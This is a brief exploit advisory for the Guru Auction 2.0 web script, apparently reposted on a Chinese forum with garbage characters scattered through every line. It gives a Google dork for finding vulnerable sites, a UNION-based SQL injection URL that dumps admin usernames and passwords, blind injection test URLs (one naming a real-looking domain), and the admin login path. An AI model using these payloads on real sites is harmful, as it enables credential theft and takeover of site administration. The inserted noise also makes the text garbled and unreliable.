Guru Auction 2.0 Multiple SQL Injection Vulnerabilities& M6 v% p" O- h: A/ C: Y- g; D
# b. l. H# g5 k: _" t
作者 : v3n0m
) ~1 m% o, z. Q! i w$ I9 [0 U应用 : Guru Auction 2.0
$ Q1 G8 w. I A+ J# D" H& NPrice : $491 w3 W& Q. _; k. L3 S' g' j
Vendor : http://www.guruscript.com/( D% o/ j& U5 @% z# L% y
Google Dork : inurl:subcat.php?cate_id=
9 h/ f' z: J7 I 2 i; @7 S* J7 J0 Y$ ~! a" N
SQLi p0c:. j0 b* L1 n$ Z. a8 V! C/ }
~~~~~~~~~~
4 S" R; T% W' a4 |$ Jhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 H) x J! G5 z: e7 f5 f( Z / c' Q7 }% S8 a3 D8 N
, n) ]- C5 E) v1 b) x' {: i
盲注 p0c: k+ R& M1 ?7 c
~~~~~~~~~~
' y& m6 t6 n F# }' P" D3 ghttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true9 Z' t$ q; F2 g: Q0 H: c
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false; a6 l) u( q" }8 X
7 X% F6 L: _: @# D* M2 U管理登录入口:
) z4 ]8 K/ p1 c" V4 E; L- D8 r5 E~~~~~~~~~~
/ P: g6 H, l( w3 r* fhttp://domain.tld/[path]/admin/& V. b% U% z5 D6 ^0 f% Z
|